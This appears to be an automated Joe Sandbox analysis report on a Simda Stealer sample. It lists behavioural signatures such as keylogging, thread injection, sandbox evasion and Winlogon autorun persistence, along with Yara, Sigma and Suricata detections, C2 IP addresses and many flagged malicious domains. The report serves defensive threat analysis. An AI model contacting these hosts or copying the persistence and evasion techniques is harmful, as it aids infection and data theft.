Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5AFlyarMds.exe

Overview

General Information

Sample name:5AFlyarMds.exe
renamed because original name is a hash value
Original sample name:Virus.Hijack.ATA_virussign.com_fcf6de7351633752cf96e861d60b2a8c.exe
Analysis ID:1507126
MD5:fcf6de7351633752cf96e861d60b2a8c
SHA1:548662dfac5acd8306b09d0af1385b6615b423da
SHA256:def2f0b62f4af989da3cd943e3120ed81c9fb24979925faac774cca11eb2ea54
Tags:Simda
Infos:

Detection

Simda Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Simda Stealer
AI detected suspicious sample
Allocates memory in foreign processes
Checks if browser processes are running
Contains VNC / remote desktop functionality (version string found)
Contains functionality to behave differently if execute on a Russian/Kazak computer
Contains functionality to capture and log keystrokes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to detect sandboxes (registry SystemBiosVersion/Date)
Contains functionality to infect the boot sector
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Creates an undocumented autostart registry key
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking volume information)
Found evasive API chain checking for user administrative privileges
Found stalling execution ending in API Sleep call
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Monitors registry run keys for changes
Moves itself to temp directory
Queries Google from non browser process on port 80
Queries random domain names (often used to prevent blacklisting and sinkholes)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to resolve many domain names, but no domain seems valid
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to create system tasks
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables security privileges
Executes massive DNS lookups (> 100)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (might use process or thread times for sandbox detection)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May initialize a security null descriptor
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Uncommon Svchost Parent Process
Tries to disable installed Antivirus / HIPS / PFW
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 5AFlyarMds.exe (PID: 7508 cmdline: "C:\Users\user\Desktop\5AFlyarMds.exe" MD5: FCF6DE7351633752CF96E861D60B2A8C)
    • svchost.exe (PID: 7524 cmdline: "C:\Windows\apppatch\svchost.exe" MD5: 9A96CBEB34AD570586652BD7772616D6)
      • cUKxeliGgCix.exe (PID: 6636 cmdline: "C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 3736 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6636 -s 804 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • cUKxeliGgCix.exe (PID: 7092 cmdline: "C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 7260 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7092 -s 800 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • cUKxeliGgCix.exe (PID: 6976 cmdline: "C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 864 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 748 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • cUKxeliGgCix.exe (PID: 6828 cmdline: "C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 3636 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6828 -s 760 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • cUKxeliGgCix.exe (PID: 6708 cmdline: "C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • cUKxeliGgCix.exe (PID: 6472 cmdline: "C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • cUKxeliGgCix.exe (PID: 6348 cmdline: "C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • cUKxeliGgCix.exe (PID: 7136 cmdline: "C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • cUKxeliGgCix.exe (PID: 7068 cmdline: "C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • cUKxeliGgCix.exe (PID: 7000 cmdline: "C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • cUKxeliGgCix.exe (PID: 6924 cmdline: "C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • cUKxeliGgCix.exe (PID: 6808 cmdline: "C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • cUKxeliGgCix.exe (PID: 6788 cmdline: "C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • cUKxeliGgCix.exe (PID: 6704 cmdline: "C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • cUKxeliGgCix.exe (PID: 6660 cmdline: "C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • cUKxeliGgCix.exe (PID: 6556 cmdline: "C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.2975747606.00000000029B0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x4b260:$a1: name=%s&port=%u
  • 0x4a9f8:$a2: data_inject
  • 0x4abe4:$a3: keylog.txt
  • 0x4a88d:$a4: User-agent: %s]]]
  • 0x4b3b4:$a5: %s\%02d.bmp
00000001.00000003.2122838115.00000000039C0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
0000001B.00000002.2126205049.0000000001590000.00000040.00000001.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x49e60:$a1: name=%s&port=%u
  • 0x495f8:$a2: data_inject
  • 0x497e4:$a3: keylog.txt
  • 0x4948d:$a4: User-agent: %s]]]
  • 0x49fb4:$a5: %s\%02d.bmp
00000001.00000003.2116591333.00000000039C0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
00000001.00000003.2148937854.00000000039C0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
Click to see the 95 entries

Unpacked PEs

SourceRuleDescriptionAuthorStrings
1.3.svchost.exe.39c0000.10.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x48660:$a1: name=%s&port=%u
  • 0x47df8:$a2: data_inject
  • 0x47fe4:$a3: keylog.txt
  • 0x47c8d:$a4: User-agent: %s]]]
  • 0x487b4:$a5: %s\%02d.bmp
0.2.5AFlyarMds.exe.400000.1.unpackJoeSecurity_SimdaStealerYara detected Simda StealerJoe Security
    0.2.5AFlyarMds.exe.400000.1.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
    • 0x4f260:$a1: name=%s&port=%u
    • 0x4e9f8:$a2: data_inject
    • 0x4ebe4:$a3: keylog.txt
    • 0x4e88d:$a4: User-agent: %s]]]
    • 0x4f3b4:$a5: %s\%02d.bmp
    1.2.svchost.exe.2c90000.6.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
    • 0x49260:$a1: name=%s&port=%u
    • 0x489f8:$a2: data_inject
    • 0x48be4:$a3: keylog.txt
    • 0x4888d:$a4: User-agent: %s]]]
    • 0x493b4:$a5: %s\%02d.bmp
    1.3.svchost.exe.39c0000.32.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
    • 0x48660:$a1: name=%s&port=%u
    • 0x47df8:$a2: data_inject
    • 0x47fe4:$a3: keylog.txt
    • 0x47c8d:$a4: User-agent: %s]]]
    • 0x487b4:$a5: %s\%02d.bmp
    Click to see the 161 entries

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: Files With System Process Name In Unsuspected Locations
    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\5AFlyarMds.exe, ProcessId: 7508, TargetFilename: C:\Windows\apppatch\svchost.exe
    Sigma detected: System File Execution Location Anomaly
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\5AFlyarMds.exe", ParentImage: C:\Users\user\Desktop\5AFlyarMds.exe, ParentProcessId: 7508, ParentProcessName: 5AFlyarMds.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 7524, ProcessName: svchost.exe
    Sigma detected: CurrentVersion NT Autorun Keys Modification
    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\system32\userinit.exe,C:\Windows\apppatch\svchost.exe,, EventID: 13, EventType: SetValue, Image: C:\Windows\apppatch\svchost.exe, ProcessId: 7524, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\userinit
    Sigma detected: Uncommon Svchost Parent Process
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\5AFlyarMds.exe", ParentImage: C:\Users\user\Desktop\5AFlyarMds.exe, ParentProcessId: 7508, ParentProcessName: 5AFlyarMds.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 7524, ProcessName: svchost.exe
    Sigma detected: Windows Processes Suspicious Parent Directory
    Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\5AFlyarMds.exe", ParentImage: C:\Users\user\Desktop\5AFlyarMds.exe, ParentProcessId: 7508, ParentProcessName: 5AFlyarMds.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 7524, ProcessName: svchost.exe

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-08T08:58:45.781717+020020181411A Network Trojan was detected44.221.84.10580192.168.2.455325TCP
    2024-09-08T08:58:45.792610+020020181411A Network Trojan was detected3.94.10.3480192.168.2.455327TCP
    2024-09-08T08:58:45.804013+020020181411A Network Trojan was detected18.208.156.24880192.168.2.455324TCP
    2024-09-08T09:00:04.164384+020020181411A Network Trojan was detected52.34.198.22980192.168.2.451518TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-08T08:58:45.781717+020020377711A Network Trojan was detected44.221.84.10580192.168.2.455325TCP
    2024-09-08T08:58:45.792610+020020377711A Network Trojan was detected3.94.10.3480192.168.2.455327TCP
    2024-09-08T08:58:45.804013+020020377711A Network Trojan was detected18.208.156.24880192.168.2.455324TCP
    2024-09-08T09:00:04.164384+020020377711A Network Trojan was detected52.34.198.22980192.168.2.451518TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-08T08:58:45.082116+020020210221A Network Trojan was detected1.1.1.153192.168.2.459394UDP
    2024-09-08T08:58:45.082125+020020210221A Network Trojan was detected1.1.1.153192.168.2.459394UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-08T08:58:45.596451+020028048521Malware Command and Control Activity Detected192.168.2.449733208.100.26.24580TCP
    2024-09-08T08:58:45.600383+020028048521Malware Command and Control Activity Detected192.168.2.45532123.253.46.6480TCP
    2024-09-08T08:58:45.724093+020028048521Malware Command and Control Activity Detected192.168.2.449733208.100.26.24580TCP
    2024-09-08T08:58:45.770436+020028048521Malware Command and Control Activity Detected192.168.2.45532544.221.84.10580TCP
    2024-09-08T08:58:45.773661+020028048521Malware Command and Control Activity Detected192.168.2.45532344.221.84.10580TCP
    2024-09-08T08:58:45.791358+020028048521Malware Command and Control Activity Detected192.168.2.45532418.208.156.24880TCP
    2024-09-08T08:58:45.792231+020028048521Malware Command and Control Activity Detected192.168.2.4553273.94.10.3480TCP
    2024-09-08T08:58:45.816789+020028048521Malware Command and Control Activity Detected192.168.2.449732188.114.96.380TCP
    2024-09-08T08:58:46.047603+020028048521Malware Command and Control Activity Detected192.168.2.45532869.162.80.6280TCP
    2024-09-08T08:58:46.103799+020028048521Malware Command and Control Activity Detected192.168.2.45533123.253.46.6480TCP
    2024-09-08T08:58:46.618089+020028048521Malware Command and Control Activity Detected192.168.2.455329154.212.231.8280TCP
    2024-09-08T08:58:46.923911+020028048521Malware Command and Control Activity Detected192.168.2.455322178.162.203.22680TCP
    2024-09-08T08:58:47.036542+020028048521Malware Command and Control Activity Detected192.168.2.455329154.212.231.8280TCP
    2024-09-08T08:58:47.360096+020028048521Malware Command and Control Activity Detected192.168.2.455332188.114.96.3443TCP
    2024-09-08T08:58:47.721019+020028048521Malware Command and Control Activity Detected192.168.2.449732188.114.96.380TCP
    2024-09-08T08:58:48.588367+020028048521Malware Command and Control Activity Detected192.168.2.455334178.162.203.22680TCP
    2024-09-08T08:58:48.769065+020028048521Malware Command and Control Activity Detected192.168.2.4553203.64.163.5080TCP
    2024-09-08T08:58:48.971417+020028048521Malware Command and Control Activity Detected192.168.2.4553203.64.163.5080TCP
    2024-09-08T08:58:49.208568+020028048521Malware Command and Control Activity Detected192.168.2.4553303.64.163.5080TCP
    2024-09-08T08:58:49.347030+020028048521Malware Command and Control Activity Detected192.168.2.455335188.114.96.3443TCP
    2024-09-08T08:58:49.408679+020028048521Malware Command and Control Activity Detected192.168.2.4553303.64.163.5080TCP
    2024-09-08T08:59:06.689492+020028048521Malware Command and Control Activity Detected192.168.2.455326199.191.50.8380TCP
    2024-09-08T08:59:08.538523+020028048521Malware Command and Control Activity Detected192.168.2.45534469.162.80.6280TCP
    2024-09-08T08:59:28.081219+020028048521Malware Command and Control Activity Detected192.168.2.455343199.191.50.8380TCP
    2024-09-08T08:59:29.366982+020028048521Malware Command and Control Activity Detected192.168.2.45535713.248.169.4880TCP
    2024-09-08T08:59:29.617381+020028048521Malware Command and Control Activity Detected192.168.2.45535818.208.156.24880TCP
    2024-09-08T08:59:29.639731+020028048521Malware Command and Control Activity Detected192.168.2.455356188.114.96.380TCP
    2024-09-08T08:59:30.541058+020028048521Malware Command and Control Activity Detected192.168.2.455359103.150.11.23080TCP
    2024-09-08T08:59:30.941638+020028048521Malware Command and Control Activity Detected192.168.2.455360188.114.96.3443TCP
    2024-09-08T08:59:31.313726+020028048521Malware Command and Control Activity Detected192.168.2.455356188.114.96.380TCP
    2024-09-08T08:59:32.685205+020028048521Malware Command and Control Activity Detected192.168.2.455363188.114.96.3443TCP
    2024-09-08T08:59:52.350601+020028048521Malware Command and Control Activity Detected192.168.2.455359103.150.11.23080TCP
    2024-09-08T08:59:56.990734+020028048521Malware Command and Control Activity Detected192.168.2.45150764.225.91.7380TCP
    2024-09-08T08:59:57.467266+020028048521Malware Command and Control Activity Detected192.168.2.45150844.221.84.10580TCP
    2024-09-08T08:59:57.467281+020028048521Malware Command and Control Activity Detected192.168.2.45150915.197.240.2080TCP
    2024-09-08T08:59:57.579475+020028048521Malware Command and Control Activity Detected192.168.2.451512103.224.212.10880TCP
    2024-09-08T08:59:57.594988+020028048521Malware Command and Control Activity Detected192.168.2.451510103.224.182.25280TCP
    2024-09-08T08:59:57.848385+020028048521Malware Command and Control Activity Detected192.168.2.451511154.85.183.5080TCP
    2024-09-08T08:59:58.262225+020028048521Malware Command and Control Activity Detected192.168.2.451511154.85.183.5080TCP
    2024-09-08T09:00:00.252851+020028048521Malware Command and Control Activity Detected192.168.2.45151572.52.179.17480TCP
    2024-09-08T09:00:00.448934+020028048521Malware Command and Control Activity Detected192.168.2.45151664.225.91.7380TCP
    2024-09-08T09:00:00.763688+020028048521Malware Command and Control Activity Detected192.168.2.45151772.52.179.17480TCP
    2024-09-08T09:00:04.163069+020028048521Malware Command and Control Activity Detected192.168.2.45151852.34.198.22980TCP
    2024-09-08T09:00:08.190889+020028048521Malware Command and Control Activity Detected192.168.2.45193644.221.84.10580TCP
    2024-09-08T09:00:12.599932+020028048521Malware Command and Control Activity Detected192.168.2.45404623.253.46.6480TCP
    2024-09-08T09:00:12.599941+020028048521Malware Command and Control Activity Detected192.168.2.4612613.64.163.5080TCP
    2024-09-08T09:00:12.599987+020028048521Malware Command and Control Activity Detected192.168.2.454044208.100.26.24580TCP
    2024-09-08T09:00:12.600150+020028048521Malware Command and Control Activity Detected192.168.2.45404269.162.80.6280TCP
    2024-09-08T09:00:12.600823+020028048521Malware Command and Control Activity Detected192.168.2.454043188.114.96.380TCP
    2024-09-08T09:00:12.601247+020028048521Malware Command and Control Activity Detected192.168.2.454047154.212.231.8280TCP
    2024-09-08T09:00:12.724904+020028048521Malware Command and Control Activity Detected192.168.2.454044208.100.26.24580TCP
    2024-09-08T09:00:12.797489+020028048521Malware Command and Control Activity Detected192.168.2.4612613.64.163.5080TCP
    2024-09-08T09:00:12.890656+020028048521Malware Command and Control Activity Detected192.168.2.454048178.162.203.22680TCP
    2024-09-08T09:00:13.029219+020028048521Malware Command and Control Activity Detected192.168.2.454047154.212.231.8280TCP
    2024-09-08T09:00:13.127782+020028048521Malware Command and Control Activity Detected192.168.2.45404923.253.46.6480TCP
    2024-09-08T09:00:14.725503+020028048521Malware Command and Control Activity Detected192.168.2.454050188.114.96.3443TCP
    2024-09-08T09:00:14.725976+020028048521Malware Command and Control Activity Detected192.168.2.454051178.162.203.22680TCP
    2024-09-08T09:00:14.896179+020028048521Malware Command and Control Activity Detected192.168.2.461260199.191.50.8380TCP
    2024-09-08T09:00:14.896238+020028048521Malware Command and Control Activity Detected192.168.2.4540453.64.163.5080TCP
    2024-09-08T09:00:14.896275+020028048521Malware Command and Control Activity Detected192.168.2.454052188.114.96.380TCP
    2024-09-08T09:00:18.602751+020028048521Malware Command and Control Activity Detected192.168.2.4540533.64.163.5080TCP
    2024-09-08T09:00:18.989971+020028048521Malware Command and Control Activity Detected192.168.2.454054199.191.50.8380TCP
    2024-09-08T09:00:20.346942+020028048521Malware Command and Control Activity Detected192.168.2.454055188.114.96.380TCP
    2024-09-08T09:00:20.656732+020028048521Malware Command and Control Activity Detected192.168.2.454056103.150.11.23080TCP
    2024-09-08T09:00:22.044255+020028048521Malware Command and Control Activity Detected192.168.2.454057188.114.96.3443TCP
    2024-09-08T09:00:22.196782+020028048521Malware Command and Control Activity Detected192.168.2.454056103.150.11.23080TCP
    2024-09-08T09:00:22.419539+020028048521Malware Command and Control Activity Detected192.168.2.454055188.114.96.380TCP
    2024-09-08T09:00:25.050995+020028048521Malware Command and Control Activity Detected192.168.2.454059188.114.96.3443TCP
    2024-09-08T09:00:25.770013+020028048521Malware Command and Control Activity Detected192.168.2.454060103.224.182.25280TCP
    2024-09-08T09:00:25.855231+020028048521Malware Command and Control Activity Detected192.168.2.454061103.224.212.10880TCP
    2024-09-08T09:00:26.125598+020028048521Malware Command and Control Activity Detected192.168.2.454062154.85.183.5080TCP
    2024-09-08T09:00:26.452662+020028048521Malware Command and Control Activity Detected192.168.2.454062154.85.183.5080TCP
    2024-09-08T09:00:28.254679+020028048521Malware Command and Control Activity Detected192.168.2.45406572.52.179.17480TCP
    2024-09-08T09:00:28.911578+020028048521Malware Command and Control Activity Detected192.168.2.45406672.52.179.17480TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: 5AFlyarMds.exeAvira: detected
    Antivirus detection for URL or domain
    Source: http://vopycoc.com/login.phpAvira URL Cloud: Label: malware
    Source: http://gaqykoz.com/login.phpAvira URL Cloud: Label: phishing
    Source: http://puvyjiq.com/http://galyfez.com/http://lyxygur.com/http://puvyjiq.com/http://lygyvon.com/http:Avira URL Cloud: Label: phishing
    Source: http://qegytop.com/Avira URL Cloud: Label: phishing
    Source: http://lyxyvyn.com/login.phpAvira URL Cloud: Label: phishing
    Source: http://vowydef.com/login.phpAvira URL Cloud: Label: malware
    Source: http://gadyfys.com/HAvira URL Cloud: Label: malware
    Source: http://qeqyxil.com/HAvira URL Cloud: Label: malware
    Source: http://lyvytud.com/login.phpAvira URL Cloud: Label: phishing
    Source: http://lysyvax.com/login.phpAvira URL Cloud: Label: malware
    Source: http://qexyfuq.com/login.phpAvira URL Cloud: Label: phishing
    Source: http://lyryled.com/login.phpAvira URL Cloud: Label: malware
    Source: http://qekyfeg.com/Avira URL Cloud: Label: phishing
    Source: http://qedyhyl.com/login.phpAvira URL Cloud: Label: phishing
    Source: http://volydyk.com/Avira URL Cloud: Label: malware
    Source: http://gatykyh.com/login.phpAvira URL Cloud: Label: malware
    Source: http://vofypam.com/login.phpAvira URL Cloud: Label: phishing
    Source: http://qetyvil.com/login.phpAvira URL Cloud: Label: malware
    Source: http://vowykaf.com/login.phpAvira URL Cloud: Label: phishing
    Source: http://gadyniw.com/login.phpAvira URL Cloud: Label: malware
    Source: http://qegyval.com/login.phpAvira URL Cloud: Label: malware
    Source: http://lyvymir.com/login.phpAvira URL Cloud: Label: malware
    Source: http://gacycaz.com/login.phpAvira URL Cloud: Label: phishing
    Source: http://gahynuw.com/login.phpAvira URL Cloud: Label: malware
    Source: http://qegyfyp.com/login.phpAvira URL Cloud: Label: malware
    Source: http://qexyhuv.com/login.phpC:Avira URL Cloud: Label: malware
    Source: http://puzylol.com/login.phpAvira URL Cloud: Label: phishing
    Source: http://vocypok.com/login.phpAvira URL Cloud: Label: malware
    Source: http://lymywaj.com/login.phpAvira URL Cloud: Label: malware
    Source: http://lysyfyj.com/login.phpAvira URL Cloud: Label: malware
    Source: http://vocyzum.com/login.phpAvira URL Cloud: Label: malware
    Source: http://ww16.vofycot.com/login.php?sub1=20240908-1659-57ee-a0d6-041620171ba1Avira URL Cloud: Label: malware
    Source: http://lyryled.com/Avira URL Cloud: Label: malware
    Source: http://puzyduq.com/login.phpAvira URL Cloud: Label: malware
    Source: http://vojydam.com/login.phpAvira URL Cloud: Label: malware
    Source: http://gadyciz.com/login.php3Avira URL Cloud: Label: malware
    Source: http://pufybyv.com/login.phpAvira URL Cloud: Label: malware
    Source: http://gadyzib.com/Avira URL Cloud: Label: malware
    Source: http://lysyxux.com/Avira URL Cloud: Label: malware
    Source: http://lyryvur.com/login.phpAvira URL Cloud: Label: malware
    Source: http://puzywag.com/Avira URL Cloud: Label: malware
    Source: http://volygyf.com/Avira URL Cloud: Label: phishing
    Source: http://lykyfen.com/login.phpAvira URL Cloud: Label: malware
    Antivirus detection for dropped file
    Source: C:\Windows\apppatch\svchost.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
    Machine Learning detection for dropped file
    Source: C:\Windows\apppatch\svchost.exeJoe Sandbox ML: detected
    Machine Learning detection for sample
    Source: 5AFlyarMds.exeJoe Sandbox ML: detected

    Compliance

    barindex
    Detected unpacking (creates a PE file in dynamic memory)
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeUnpacked PE file: 6.2.cUKxeliGgCix.exe.2550000.2.unpack
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeUnpacked PE file: 13.2.cUKxeliGgCix.exe.3100000.2.unpack
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeUnpacked PE file: 19.2.cUKxeliGgCix.exe.2910000.2.unpack
